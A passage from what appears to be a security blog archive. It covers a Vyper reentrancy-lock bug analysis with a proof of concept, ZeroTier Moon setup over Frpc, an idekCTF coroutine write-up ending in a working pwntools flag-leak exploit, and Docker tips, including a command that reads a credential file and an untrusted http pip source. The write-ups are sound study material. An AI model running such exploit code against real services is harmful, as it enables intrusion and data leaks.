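    def slot_for(self, key):
        # Reuse the slot if this key was seen before; otherwise take the next free one.
        if key not in self.slots:
            self.slots[key] = self.globals_size + len(self.slots)
        return self.slots[key]


alloc = KeyedLockAllocator(globals_size=3)
add_liquidity_slot = alloc.slot_for("lock")   # @nonreentrant('lock') on add_liquidity
exchange_slot = alloc.slot_for("lock")        # @nonreentrant('lock') on exchange
other_slot = alloc.slot_for("other_lock")     # a differently named lock
print(add_liquidity_slot, exchange_slot, other_slot)
```

Both functions decorated with 'lock' end up on the same slot, while a differently named lock gets the next one.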

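2. The vulnerable reentrancy-lock logic

Before the vulnerable commit, the slots holding reentrancy-lock state were appended directly after the storage allocated for global variables: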

def get_nonrentrant_counter(self, key):
    if key in self._nonrentrant_keys:
        return self._nonrentrant_keys[key]
    else:
        # Note how counter is computed here
        counter = (
            sum(v.size for v in self._globals.values() if not isinstance(v.typ, MappingType))
            + self._nonrentrant_counter
        )
        self._nonrentrant_keys[key] = counter
        self._nonrentrant_counter += 1
        return counter

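The vulnerable commit tried to merge the allocation of lock state with the allocation of the other global variables. In other words, lock slots were now assigned while parsing the Vyper AST, rather than being generated on the fly during IR generation. The function that used to assign lock slots dynamically, global_ctx.get_nonrentrant_counter, was therefore no longer called, and the developers marked it as dead code. The job of assigning lock slots moved to set_storage_slots, which runs during AST analysis and previously only assigned storage slots to variables.

So how does the vulnerable commit assign a lock slot to each function? It allocates one reentrancy-lock slot per function. Locks that share a name but sit on different functions therefore no longer block reentrancy between those functions.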
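To see why per-function slots defeat the lock, here is a small Python simulation. It is a sketch under stated assumptions, not Vyper output: Storage, nonreentrant, build_contract and reenter are hypothetical helpers, and the "external call that re-enters" is modeled as add_liquidity calling exchange directly.

```python
class Storage(dict):
    """Toy contract storage: unset slots read as 0."""
    def __missing__(self, slot):
        return 0


def nonreentrant(slot):
    """Emulate the generated IR: require slot == 0, set it to 1, clear it on exit."""
    def wrap(fn):
        def guarded(storage, *args):
            if storage[slot] != 0:
                raise RuntimeError("reentrancy blocked")
            storage[slot] = 1
            try:
                return fn(storage, *args)
            finally:
                storage[slot] = 0
        return guarded
    return wrap


def build_contract(exchange_slot):
    @nonreentrant(exchange_slot)
    def exchange(storage):
        return "exchange executed"

    @nonreentrant(0)
    def add_liquidity(storage):
        # Stand-in for an external call that re-enters the contract.
        return exchange(storage)

    return add_liquidity


def reenter(exchange_slot):
    try:
        return build_contract(exchange_slot)(Storage())
    except RuntimeError as err:
        return str(err)


print(reenter(exchange_slot=0))  # shared slot, as before the commit
print(reenter(exchange_slot=1))  # one slot per function, as in the vulnerable commit
```

With a shared slot the nested call is rejected; with one slot per function the nested call to exchange goes through even though both functions are nominally guarded by the same lock name.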

3. Demonstration

Here is a PoC for the Vyper reentrancy bug:

@external
@nonreentrant('lock')
def add_liquidity() -> uint256:
    return 0

@external
@nonreentrant('lock')
def exchange() -> uint256:
   return 0

The PoC is simple: it declares two different functions that use a reentrancy lock with the same name. Let's dump its IR:

Command to dump the IR: python3 vyper.py -f ir

$ python3 vyper.py -f ir vyper_workdir/test.vy
[seq,
  [return,
    0,
    [lll,
      [seq,
        [if, [lt, calldatasize, 4], [goto, fallback]],
        [mstore, 28, [calldataload, 0]],
        [with,
          _func_sig,
          [mload, 0],
          [seq,
            [assert, [iszero, callvalue]],
            # Line 3
            [if,
              [eq, _func_sig, 3964006281 ],
              [seq,
                [assert, [iszero, [sload, 0]]],    # check the lock state
                [sstore, 0 /*slot*/, 1 /*val*/],   # acquire the lock
                pass,
                # Line 4
                [mstore, 0, 0],
                [seq_unchecked, [sstore, 0, 0], [return, 0, 32]],
                # Line 3
                [sstore, 0, 0],                    # release the lock
                stop]],
            # Line 8
            [if,
              [eq, _func_sig, 3539412570 ],
              [seq,
                [assert, [iszero, [sload, 1]]],    # check the lock state
                [sstore, 1, 1],                    # acquire the lock
                pass,
                # Line 9
                [mstore, 0, 0],
                [seq_unchecked, [sstore, 1, 0], [return, 0, 32]],
                # Line 8
                [sstore, 1, 0],                    # release the lock
                stop]]]],
        [seq_unchecked, [label, fallback], /* Default function */ [revert, 0, 0]]],
      0]]]

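The two pairs of sstore instructions use different slots: the first function uses slot 0, while the second uses slot 1.

4. The fix

The patch is simple: a new slot is allocated only when a lock with a new name appears: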

Building a ZeroTier Moon Behind Frpc NAT Traversal

2023-05-16T16:00:00.000Z

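I. Introduction

ZeroTier is a tool for building virtual networks across sites. It connects machines in different locations, either peer-to-peer or through a relay, so that they behave as if they were on the same LAN.

A ZeroTier network has three kinds of nodes: Planet, the central servers located overseas; Moon, a user-hosted node; and Leaf, every other user node.

Because the Planet servers are overseas, both UDP hole punching and relaying are very slow when two machines are far apart. So I tried to set up a domestic ZeroTier Moon to improve the hole-punching success rate and the relay speed.

Every Moon tutorial I found online requires buying a server. I did not want to go that far, so I explored building one on top of Frpc NAT traversal instead.

II. ZeroTier Hole Punching and Relaying

Before doing NAT traversal or building a Moon, we need to understand how ZeroTier punches holes and relays traffic.

This section is based on ZeroTierOne/service/OneService.cpp on GitHub, plus many painful hours of debugging and Wireshark captures.

1. Listening state

ZeroTier uses three local ports at the same time, and listens for both TCP and UDP on each of them. This is what ZeroTier listens on on my machine: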

➜  zerotier-one sudo lsof -i -P -n | grep zerotier
zerotier- 2091716    zerotier-one    6u  IPv4 868501026      0t0  TCP 127.0.0.1:9993 (LISTEN)
zerotier- 2091716    zerotier-one    7u  IPv6 868501027      0t0  TCP [::1]:9993 (LISTEN)

zerotier- 2091716    zerotier-one   16u  IPv4 868501047      0t0  UDP 192.168.51.236:9993
zerotier- 2091716    zerotier-one   17u  IPv4 868501048      0t0  TCP 192.168.51.236:9993 (LISTEN)

zerotier- 2091716    zerotier-one   14u  IPv4 868501045      0t0  UDP 192.168.51.236:30978
zerotier- 2091716    zerotier-one   15u  IPv4 868501046      0t0  TCP 192.168.51.236:30978 (LISTEN)

zerotier- 2091716    zerotier-one   18u  IPv4 868501049      0t0  UDP 192.168.51.236:42276
zerotier- 2091716    zerotier-one   19u  IPv4 868501050      0t0  TCP 192.168.51.236:42276 (LISTEN)

# ... remaining IPv6 listeners omitted

2. The three ports

Ports first. The three ports are the primary, secondary, and tertiary ports, defined as the comment below describes:

// ref: https://github.com/zerotier/ZeroTierOne/blob/adfbbc3/service/OneService.cpp#L802

/*
* To attempt to handle NAT/gateway craziness we use three local UDP ports:
*
* [0] is the normal/default port, usually 9993
* [1] is a port derived from our ZeroTier address
* [2] is a port computed from the normal/default for use with uPnP/NAT-PMP mappings
*
* [2] exists because on some gateways trying to do regular NAT-t interferes
* destructively with uPnP port mapping behavior in very weird buggy ways.
* It's only used if uPnP/NAT-PMP is enabled in this build.
*/

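The primary port defaults to 9993 (the default can be changed; see ZeroTier One Network Virtualization Service Documentation).

Some Moon tutorials online configure port 9995, and without reading the source it is easy to get confused about which port matters.
To be clear: by default ZeroTier does not use port 9995 at all, only port 9993.

When the host tries to connect to a peer, all three ports send UDP data to the peer at the same time.

Here "host" means the local machine. P2P is decentralized, but distinguishing the local machine from the remote peer makes the explanation easier.

When the peer receives the data, the matching port immediately sends a UDP packet back to the source address to punch the hole. If the host receives any one of the three UDP replies, the peer counts as DIRECT, meaning the P2P hole punch succeeded. The host and the peer then exchange periodic heartbeats to keep the hole open, and data flows through whichever port the host received the peer's reply on.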
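The "send from every port, keep whichever one gets an answer" idea can be sketched with plain UDP sockets. This is only an illustration of the pattern, not the ZeroTier wire protocol: probe_peer, its parameters, and the payload are all hypothetical.

```python
import select
import socket


def probe_peer(peer, local_ports=(0, 0, 0), payload=b"hello", timeout=2.0):
    """Send one datagram from each local socket; return (local_port, reply) for the first answer."""
    socks = []
    try:
        for port in local_ports:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.bind(("", port))          # port 0 lets the OS pick a free port
            s.sendto(payload, peer)
            socks.append(s)
        readable, _, _ = select.select(socks, [], [], timeout)
        if not readable:
            return None                 # no reply on any port: a relay would be needed
        reply, _ = readable[0].recvfrom(2048)
        return readable[0].getsockname()[1], reply
    finally:
        for s in socks:
            s.close()
```

Calling probe_peer(("203.0.113.5", 9993)) with a real peer address would return the local port that received the first reply, which corresponds to the port used for the direct path afterwards.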

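In packet captures I often see the host send three UDP packets to the peer (one per port), yet receive only one UDP packet back.

zerotier-cli peers shows whether the connection to each peer is DIRECT (P2P) or RELAY. Those are the only two states.

The command requires sudo or administrator privileges.

ZeroTier also listens for TCP on these three ports. This TCP traffic has nothing to do with hole punching or peer communication. It is actually HTTP, used mainly by the local zerotier-cli to talk to the service, for example: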

➜  zerotier-one echo "GET /info HTTP/1.1\r\nX-ZT1-Auth: $(sudo cat /var/lib/zerotier-one/authtoken.secret)\r\n\r\n" | nc 127.0.0.1 9993 -v
Connection to 127.0.0.1 9993 port [tcp/*] succeeded!
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Content-Length: 91
Connection: close

{
        "controller": true,
        "apiVersion": 4,
        "clock": 1684295560845,
        "databaseReady": true
}

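I only ever got the TCP connection to 127.0.0.1:9993 to work. Every other combination of listening port and address failed when tested with nc, and I do not yet know why.

For the other HTTP endpoints, see the Network Virtualization Service API. I will not go into them here.

3. Relaying

When the host and the peer cannot connect directly, ZeroTier falls back to relaying. The logic lives in the nodeWirePacketSendFunction function.

There are two kinds of relay, TCP and UDP:

UDP relay. This is ZeroTier's main relay mechanism. It looks for a Moon or Planet and asks it to relay the outgoing packets over UDP, so both the host and the peer send and receive nothing but UDP. The logic is straightforward.
TCP relay. ZeroTier considers TCP relaying too expensive, so it only uses it under extremely bad conditions, for example when UDP relaying fails completely because a gateway filters every UDP packet or timeouts are severe. Such conditions are rare, so in practice ZeroTier almost never uses TCP relay.
ZeroTier only switches to TCP relay after receiving no data at all for 60 s. That is a long time, and I expect most setups never hit it.

You can configure local.conf as described in ZeroTier TCP Proxy Server Documentation to force TCP relay. Once forced TCP relay is on, UDP relay is disabled. ZeroTier considers TCP relay slower than UDP relay, but when I tested with ping, the TCP relay node was actually closer to me and had lower latency than the UDP relay node. So take that claim with a grain of salt and measure on your own network.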

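III. Frpc NAT Traversal

1. Approach

Frpc exposes UDP port 9993 of the Moon server to the public network.

I use NatFrp, which is genuinely generous: the free tier gives 5Gb/10Mbps/2tunnel per month, enough for most needs.

Pick a data center close to your peers, and prefer a multi-line one (as I understand it, a data center connected to several carriers at once), so that the local machine has a good chance of punching through no matter which carrier it is on. This is my tunnel configuration:

Note that the local IP must be a LAN IP (for example in 192.168.0.0/16), not the loopback IP (127.0.0.1). The accepted LAN ranges are shown in the figure below:

The relevant code is in the InetAddress::ipScope function.

Seeing that 172.16.0.0/12 is also accepted, you might add an extra virtual-network IP starting with 172.16 to the Moon server (the machine being exposed) in the ZeroTier control panel, bind Frpc to that new IP, and expect it to work. In my tests it does not, because the ZeroTier service does not listen on IPs inside ZeroTier's own virtual network.

The local IP you enter must both fall within the ranges in the figure above and be an IP on which ZeroTier listens for UDP.

2. How it works

Skip this section if you are not interested in the details.

The reason is that isAddressValidForPath treats only four IP scopes as valid: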

/**
  * Check whether this address is valid for a ZeroTier path
  *
  * This checks the address type and scope against address types and scopes
  * that we currently support for ZeroTier communication.
  *
  * @param a Address to check
  * @return True if address is good for ZeroTier path use
*/
static inline bool isAddressValidForPath(const InetAddress &a)
{
    if ((a.ss_family == AF_INET)||(a.ss_family == AF_INET6)) {
        switch(a.ipScope()) {
                /* Note: we don't do link-local at the moment. Unfortunately these
         * cause several issues. The first is that they usually require a
         * device qualifier, which we don't handle yet and can't portably
         * push in PUSH_DIRECT_PATHS. The second is that some OSes assign
         * these very ephemerally or otherwise strangely. So we'll use
         * private, pseudo-private, shared (e.g. carrier grade NAT), or
         * global IP addresses. */
            case InetAddress::IP_SCOPE_PRIVATE:
            case InetAddress::IP_SCOPE_PSEUDOPRIVATE:
            case InetAddress::IP_SCOPE_SHARED:
            case InetAddress::IP_SCOPE_GLOBAL:
                if (a.ss_family == AF_INET6) {
                    // TEMPORARY HACK: for now, we are going to blacklist he.net IPv6
                    // tunnels due to very spotty performance and low MTU issues over
                    // these IPv6 tunnel links.
                    const uint8_t *ipd = reinterpret_cast<const uint8_t *>(reinterpret_cast<const struct sockaddr_in6 *>(&a)->sin6_addr.s6_addr);
                    if ((ipd[0] == 0x20)&&(ipd[1] == 0x01)&&(ipd[2] == 0x04)&&(ipd[3] == 0x70)) {
                        return false;
                    }
                }
                return true;
            default:
                return false;
        }
    }
    return false;
}

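The valid scopes include IP_SCOPE_PRIVATE (LAN addresses) and IP_SCOPE_GLOBAL (public addresses), but not IP_SCOPE_LOOPBACK (loopback addresses).

When ZeroTier receives a UDP packet, it reads the destination IP from the packet and uses it to decide whether the packet is acceptable. The reasoning is easy to follow: knowing which of its own IPs the peer sent to tells ZeroTier which interface can be used for P2P hole punching.

But if FRP is bound to 127.0.0.1 on the local machine, then even though other peers can reach udp://127.0.0.1:9993 through FRP, ZeroTier drops the UDP data it receives and the P2P connection fails.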
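Before binding Frpc to an address, it can help to check roughly which scope that address falls in. The sketch below uses Python's standard ipaddress module as an approximation of the check above. It is an assumption-laden stand-in: is_valid_for_path is a hypothetical helper, and it does not reproduce ZeroTier's exact ipScope tables (for example the pseudo-private ranges or the he.net IPv6 blacklist).

```python
import ipaddress


def is_valid_for_path(addr):
    """Rough analogue of isAddressValidForPath: reject scopes that are not usable for paths."""
    ip = ipaddress.ip_address(addr)
    if ip.is_loopback or ip.is_link_local or ip.is_multicast or ip.is_unspecified:
        return False
    # Private, shared (carrier-grade NAT) and global addresses are all accepted.
    return True


for candidate in ("192.168.51.236", "127.0.0.1", "169.254.10.1", "100.64.0.1", "8.8.8.8"):
    print(candidate, is_valid_for_path(candidate))
```

The loopback check comes first on purpose: Python reports 127.0.0.1 as both loopback and private, so testing is_private alone would wrongly accept it.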

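IV. Testing Frpc

After creating the tunnel and connecting Frpc on the remote Moon machine, test UDP send and receive between the host and the Moon.

This step matters a lot. Because of how UDP works, many networks filter UDP packets aggressively.

On my campus network, for example, I could not send or receive UDP packets at all.

The test is simple:

On the Moon machine, change the port that frpc forwards to from 9993 to 9992 and restart frpc. Tunneled UDP data should now arrive at local port 9992.
You can do this either by editing frpc.ini directly, or by changing it in the web panel and pulling the configuration again.
There is nothing special about 9992; pick any port you can remember. The port has to change because 9993 is already taken by the ZeroTier service, and a UDP port cannot be bound by several listeners at once.

Start a UDP echo server on the Moon machine. This is the Python code I used: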

# python3 /tmp/udp-echoserver.py 192.168.XX.XX 9992

import sys
import socket

def udp_echo_server(host, port):
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    server_socket.bind((host, port))
    print(f"UDP Echo server started on {host}:{port}")
    while True:
       data, addr = server_socket.recvfrom(1024)
       print(f"Received data from {addr}: {len(data)}")
       server_socket.sendto(b"server: " + data, addr)

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python udp_echo_server.py <host> <port>")
        sys.exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2])
    udp_echo_server(host, port)

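On the host, run nc -u to send UDP packets to the Frpc relay server and check whether they are echoed back.

The result looks like this. The top two windows in the screenshot are shells on the Moon server and the bottom one is a shell on the host. The host runs nc -u, types some data interactively, and presses Enter to send it. The UDP packet goes to the Frpc relay server, is tunneled to udp://192.168.x.x:9992 on the Moon, and the echo server on port 9992 sends it back (prefixed with "server: " by the script above). If the host gets its data back after sending, UDP works in both directions.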
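If nc is not available on the host, the same check can be scripted. The following is a minimal sketch of a client for the echo server above; udp_echo_check and its parameters are names chosen here for illustration, and the host and port you pass in would be whatever the Frpc relay allocated.

```python
import socket


def udp_echo_check(host, port, payload=b"ping", timeout=3.0):
    """Return True if the echo server answers with b"server: " + payload."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(payload, (host, port))
        try:
            data, _ = sock.recvfrom(2048)
        except OSError:   # socket.timeout is a subclass of OSError
            return False
        return data == b"server: " + payload
```

A False result means either no reply arrived within the timeout or the reply did not match, which is the same symptom as nc -u showing nothing.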

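This step can fail. I ran into two causes:

The port allocated by the public Frpc relay server is too high, for example 50000 or above. High UDP ports may be filtered by routing policy. The only remedy is to request a new UDP tunnel or switch to another relay node until you get a lower port.
In my tests, UDP ports below 30000 almost never caused problems.
Complex or restricted networks, such as campus networks, may block UDP. On my campus network I could not send or receive UDP at all, but the test passed as soon as I switched to a phone hotspot.

To check that port 9993 receives traffic, use: sudo tshark -i any udp port 9993 and src host 192.168.x.x
When the UDP test is done, remember to change the tunnel port back to 9993.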

V. Building the ZeroTier Moon

There are plenty of Moon tutorials online and they are all much alike. One to follow is 搭建ZeroTier的Moon服务器小记 - dengzile

On the Moon server:

# 0. Switch to the working directory
cd /var/lib/zerotier-one

# 1. Create the base moon file
sudo zerotier-idtool initmoon identity.public > moon.json

# 2. Edit stableEndpoints in moon.json to the public IP and port allocated by Frpc
# (the tunnel must map to port 9993 on the moon)

# 3. Sign moon.json to generate the moon file
sudo zerotier-idtool genmoon moon.json

# 4. Move the signed moon file into the moons.d directory
mkdir moons.d
mv 000000*.moon moons.d

# 5. Restart the zerotier-one service
sudo service zerotier-one restart

# 6. The current moons can now be listed
sudo zerotier-cli listmoons

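On Windows (the local machine), open cmd as administrator:

# 0. Switch to the working directory
C:\Users\Kiprey>cd C:\ProgramData\ZeroTier\One

# 1. Create the moons.d directory and enter it
C:\ProgramData\ZeroTier\One>mkdir moons.d
C:\ProgramData\ZeroTier\One>cd moons.d

# 2. Copy the moon file from the remote moon node. The moon is not configured yet, so this download actually goes through a UDP relay.
C:\ProgramData\ZeroTier\One\moons.d>scp kiprey@172.24.0.133:/var/lib/zerotier-one/moons.d/000000xxxxxxxxxx.moon .
000000xxxxxxxxxx.moon                        100%  259     0.5KB/s   00:00

# 3. Restart the service
# Press Win + R to open the Run dialog -> services.msc -> find the Zerotier-One service and restart it

Distributing the moon file should also be possible with the zerotier-cli orbit command, but in my tests orbit sometimes failed to deliver the file. I am not sure what went wrong, so I ended up downloading it by hand.
This is a minor point, mentioned only in passing.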

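After restarting the local ZeroTier service, run zerotier-cli peers again. The Moon node and the nodes near it have all switched from RELAY to DIRECT:

Before configuring the moon:
sshping latency averaged as high as 300 ms, and ssh sessions stuttered.
After configuring the moon:
sshping latency dropped to about 100 ms, and ssh became noticeably smoother.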

idekCTF2022 - Coroutine Writeup

2023-01-20T16:00:00.000Z

Introduction

Last weekend I participated in idekCTF 2022 with r3kapig. After briefly browsing the other pwn challenges, I picked Coroutine and eventually solved it (4 solves in total).

Now, let’s dive into this challenge!

C++20 Coroutine

What is a coroutine?

A coroutine is a function that can suspend execution to be resumed later. Coroutines are stackless: they suspend execution by returning to the caller and the data that is required to resume execution is stored separately from the stack. This allows for sequential code that executes asynchronously (e.g. to handle non-blocking I/O without explicit callbacks), and also supports algorithms on lazy-computed infinite sequences and other uses.
ref: Coroutines (C++20) - cppreference

As the definition says, coroutines run in a single-threaded environment. A coroutine can be suspended whenever needed (e.g. while waiting for a response from a peer) and resumed at a suitable later time (e.g. when the peer's reply arrives).

What does this mean?

The execution environment may differ before and after a co_await statement (e.g. the current thread ID).
If the coroutine holds a pointer or reference to outside memory, this may cause memory-safety problems (e.g. UAF, UAP, ...).

Program Logic

The user can interact with the proxy to change its receive and send buffer sizes. Interestingly, the program's own send buffer is manually set to 128 bytes. Both hints suggest that the vulnerability is related to socket buffer sizes.

int sendbuff = 128;
setsockopt(accept_result, SOL_SOCKET, SO_SNDBUF, &sendbuff, sizeof(sendbuff));

A careful read of the source shows that the program acts as an echo server, reading messages from the proxy and sending them back:

It creates and runs a coroutine. Inside the coroutine, the program accepts the client connection and enters client_loop, which repeatedly receives messages from the client and sends them back.

If the program cannot receive from the client (e.g. no data is available yet) or cannot send to the client (e.g. the socket buffer is full), the coroutine saves its own coroutine handle and suspends itself, returning to the caller:

class RecvAsync : NonCopyable {   // SendAsync has the same structure
public:
    ...
    auto operator co_await() {
        struct Awaiter {
            ...

            bool await_ready() {
                ...
            }
            void await_suspend(std::coroutine_handle<> handle) noexcept {
                // save current coroutine handle 
                ctx_.add_read(fd_, std::move(handle));
            }
            int await_resume() {
                ...
            }
        };
        return Awaiter{ ctx_, fd_, buffer_ };
    }
    ...
};

The program then enters io_context::run_until_done, monitors the file descriptors with select, and resumes the corresponding coroutine whenever a file descriptor becomes ready.

Interestingly, on every iteration of the loop in run_until_done, the program calls load_flag, which loads the flag onto the stack.

void load_flag()
{
    char flag[400];
    FILE* fp = fopen("flag", "rt");
    fscanf(fp, "%s", flag);
    fclose(fp);
}

void run_until_done()
{
    while (!reads_.empty() || !writes_.empty())
    {
        load_flag();
        ...
    }
}

Vulnerability

I was interested in how the coroutine captures the context, so I modified the code and printed out the addresses of all the buffers. Here are some code snippets.

Task<bool> client_loop(io_context& ctx, int socket)
{
    while (true)
    {
        std::byte buffer[512];
        printf("client_loop buffer before RecvAsync: %p\n", buffer);
        int recved = co_await RecvAsync(ctx, socket, buffer);
        ...
    }
}

Output: client_loop buffer before RecvAsync: 0x5603212fff89

This output indicates that buffers declared inside a coroutine live on the heap. In other words, the whole coroutine frame is effectively a heap object. That is why a coroutine can suspend and resume at different times: its context is preserved in the frame allocated when it is created.

However, after checking every buffer's address, I found that the coroutine does not capture buffer2 in SendAllAsyncNewline. That function contains no co_await or co_return, so it is an ordinary function and buffer2 is an ordinary stack local. Its address is on the stack, not far from where the flag is stored (less than 512 bytes, 0x200, away).

void load_flag()
{
    char flag[400];
    printf("load_flag: %p\n", flag);
    FILE* fp = fopen("flag", "rt");
    fscanf(fp, "%s", flag);
    fclose(fp);
}

Task<bool> SendAllAsyncNewline(io_context& ctx, int socket, std::span<std::byte> buffer)
{
    std::byte buffer2[513];
    printf("SendAllAsyncNewline buffer: %p\n", buffer.data());
    printf("SendAllAsyncNewline buffer2: %p\n", buffer2);
    std::copy(buffer.begin(), buffer.end(), buffer2);
    buffer2[buffer.size()] = (std::byte)'\n';
    return SendAllAsync(ctx, socket, std::span(buffer2, buffer.size()+1));
}

Output:
SendAllAsyncNewline buffer: 0x559806712f89
SendAllAsyncNewline buffer2: 0x7ffc1ddfd3a0
load_flag: 0x7ffc1ddfd480

SendAllAsync may also need several SendAsync calls to send all the data:

Task<bool> SendAllAsync(io_context& ctx, int socket, std::span<std::byte> buffer)
{
    int offset = 0;
    while (offset < buffer.size())
    {
        int result = co_await SendAsync(ctx, socket, std::span(buffer.data() + offset, buffer.size() - offset));
        if (result == -1)
        {
            co_return false;
        }

        offset += result;
    }
    co_return true;
}

By interacting with the proxy carefully, we can leak the flag as follows:

Fill the socket buffer in advance, so that SendAllAsync suspends between two SendAsync calls and control returns to run_until_done.
run_until_done calls load_flag, which loads the flag into stack memory that happens to overlap buffer2.
Drain the proxy's receive buffer so that the program can resume sending buffer2 to the client. Because the flag now sits inside buffer2, it is sent along with the rest.
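The three steps can be replayed in a small Python model of the stack reuse. This is a simulation under stated assumptions, not the challenge binary: FLAG is a placeholder value, stack is a bytearray standing in for the reused stack region, send_all and first_chunk are hypothetical names, and the only number taken from the writeup is the distance between the two printed addresses.

```python
FLAG = b"idek{dummy_flag_for_illustration}"     # placeholder, not the real flag
FLAG_OFFSET = 0x7ffc1ddfd480 - 0x7ffc1ddfd3a0   # flag[] starts 0xe0 bytes into buffer2[]

stack = bytearray(1024)                 # stand-in for the reused stack region
mem = memoryview(stack)
buffer2 = mem[:513]                     # dangling view kept by the suspended coroutine


def load_flag():
    # load_flag() writes its local array on top of the dead buffer2 frame.
    mem[FLAG_OFFSET:FLAG_OFFSET + len(FLAG)] = FLAG


def send_all(first_chunk):
    buffer2[:512] = b"a" * 512            # SendAllAsyncNewline copies the user data
    sent = bytes(buffer2[:first_chunk])   # first SendAsync: the socket buffer fills up
    load_flag()                           # coroutine suspended, run_until_done loops
    sent += bytes(buffer2[first_chunk:])  # resumed SendAsync reads stale stack memory
    return sent


leaked = send_all(first_chunk=128)
print(FLAG in leaked)
```

The leak only works when the first partial send stops before offset 0xe0, which is why the exploit has to find the right amount of data to pre-fill the buffers with.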

Exploit

Once you find the threshold for the amount of data to send in the Docker environment, the rest of the challenge is easy.

Note: you can find the threshold more easily by modifying the source code, if you like.

# -*- coding: utf-8 -*-
from pwn import *

# io = remote("coroutine.chal.idek.team", 1337)
io = process("python3 proxy.py", shell=True)

context(terminal=['gnome-terminal', '-x', 'bash', '-c'], os='linux', arch='amd64')
context.log_level = 'info'

# Change Receive Buffer
io.sendlineafter("Select Option:", b"2")
# Change Receive Buffer size to the minimal size
io.sendlineafter("Buffer size> ", b"1")

# Connect
io.sendlineafter("Select Option:", b"1")


# Fill the proxy receive buffer and the remote send buffer.
send_size = 5 * 512 + 314 # 0xb3a
while send_size > 0:
    current_send_size = min(512, send_size)
    send_size -= current_send_size
    
    io.sendlineafter("Select Option:", b"4")
    io.sendlineafter("Data>", b"a" * current_send_size)
    
# With the proxy receive buffer and the remote send buffer both full,
# `SendAllAsync` is suspended and `load_flag` runs
io.sendlineafter("Select Option:", b"4")
io.sendlineafter("Data>", b"a" * 512)

# Read the receive buffer; `SendAllAsync` resumes and sends the flag.
for _ in range(6):
    print(io.sendlineafter("Select Option:", b"5"))
    print(io.sendlineafter("Size>", b'4096'))

You can read the flag idek{exploiting_coroutines} in the data received by the proxy.

In fact, I did not write a Python exploit script while solving this challenge; I interacted with the remote server directly through nc. The script above was written afterwards from my interaction logs.

Notes on Docker for CTF

2023-01-07T16:00:00.000Z

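Introduction

Whenever I play CTFs, I tend to avoid spinning up the Docker environment because Docker is slow, I forget the commands, and so on. But without the Docker environment, working on a challenge is just armchair theorizing.

So I used RealWorldCTF 5th as an opportunity to get comfortable with Docker and write things down. Interested pwners are welcome to follow along.

Docker management commands

docker image list --all: list all images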

➜ docker image list
REPOSITORY   TAG        IMAGE ID       CREATED         SIZE
<none>       <none>     cc3193e40804   8 minutes ago   121MB
<none>       <none>     fd184cbecbe0   3 months ago    72.8MB
ubuntu       20.04      a0ce5a295b63   4 months ago    72.8MB
python       3.6-slim   c1e40b69532f   12 months ago   119MB
ubuntu       14.04      13b66b487594   21 months ago   197MB

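docker image rm <image>: remove a specific image

docker container list --all: list all containers.
Equivalent to docker ps -a.
docker container rm <container>: remove a container.
Equivalent to docker rm.
docker build -t <name> .: build an image from the Dockerfile in the current directory and name it <name>.
docker run <image> [cmd]: create a new container from an image and run cmd in it (if given).
docker start -i <container>: start a container in interactive mode.
docker stop <container>: stop a running container.
docker save -o <file> <image>: export an image to a file.
docker load -i <file>: import an image file into Docker. These two commands are typically used to move images around as tar archives.
docker exec -it <container> <cmd>: run a command inside a running container.
To run a command in a stopped container, start it with docker start first and then use docker exec.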

Dockerfile topics

Switching Docker registry mirrors

sudo nano /etc/docker/daemon.json

Write the following content:

{
    "registry-mirrors": [
        "https://yxzrazem.mirror.aliyuncs.com",
        "http://hub-mirror.c.163.com",
        "https://registry.docker-cn.com",
        "https://docker.mirrors.ustc.edu.cn"
    ]
}

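The odd-looking Aliyun mirror address above is a dedicated address issued by the Aliyun image accelerator. I simply copied someone else's. There are several other mirrors in the list, so if this one fails the others still work.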
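When mirror lists are collected from several sources by hand, duplicate entries slip in easily. A small Python helper can merge new mirrors into an existing daemon.json dictionary without clobbering other keys. This is a convenience sketch: merge_registry_mirrors is a hypothetical name, and writing the result back to /etc/docker/daemon.json is left to the reader.

```python
import json


def merge_registry_mirrors(config, mirrors):
    """Return a copy of a daemon.json dict with mirrors appended and duplicates dropped."""
    merged = dict(config)
    combined = list(config.get("registry-mirrors", [])) + list(mirrors)
    merged["registry-mirrors"] = list(dict.fromkeys(combined))  # keeps first-seen order
    return merged


existing = {"log-driver": "json-file", "registry-mirrors": ["http://hub-mirror.c.163.com"]}
updated = merge_registry_mirrors(existing, [
    "http://hub-mirror.c.163.com",
    "https://docker.mirrors.ustc.edu.cn",
])
print(json.dumps(updated, indent=4))
```

dict.fromkeys is used instead of set so that the mirror order, which determines which mirror Docker tries first, is preserved.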

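Restart the Docker service:

sudo service docker restart

Note: if the host has network access but Docker does not, restarting the Docker service usually fixes it.

Replacing the apt source in a Dockerfile

The default apt source downloads painfully slowly, so add a few lines to replace it.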

RUN cat /etc/apt/sources.list
RUN sed -i s@/archive.ubuntu.com/@/mirrors.aliyun.com/@g /etc/apt/sources.list \
   && sed -i s@/deb.debian.org/@/mirrors.aliyun.com/@g /etc/apt/sources.list \
   && sed -i s@/security.debian.org/@/mirrors.aliyun.com/@g /etc/apt/sources.list \
   && sed -i s@/security.ubuntu.com/@/mirrors.aliyun.com/@g /etc/apt/sources.list \
   && apt-get clean

Replacing the pip source in a Dockerfile

Add the following to the Dockerfile:

RUN mkdir ~/.pip && \
    cd ~/.pip/  && \
    echo "[global] \ntrusted-host =  pypi.douban.com \nindex-url = http://pypi.douban.com/simple" >  pip.conf

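Network acceleration in a Dockerfile

- GitHub acceleration: use a GitHub file acceleration site to generate accelerated download links for GitHub files.
- Docker proxy: see Docker 配置网络代理 - CSDN

Building an image from a Dockerfile

In the directory containing the Dockerfile, run docker build -t chal . to build the image.
This names the resulting image chal, so you can refer to it by name when starting a container instead of looking up the image ID.

Creating and starting a container

# -i  interactive mode
# -t  allocate a pseudo-terminal
# --name  name of the container to start
# -d  run the container in the background (detached mode); we rarely need this
# --privileged=true  grant extended privileges
# -p host-port:container-port  port mapping
# -v host-path:container-path  path mapping
docker run --name <container-name> -it <image> [cmd]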

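For example:

docker run -it --name paddle_chal_container paddle_chal:latest

If docker run is given no trailing command and the Dockerfile contains a CMD instruction (e.g. CMD ["python", "web_service.py"]), docker run runs that command automatically.

Note: avoid starting a terminal by adding CMD ["/bin/bash"] to the end of the Dockerfile, because in a terminal started that way the backspace key is escaped and unusable.

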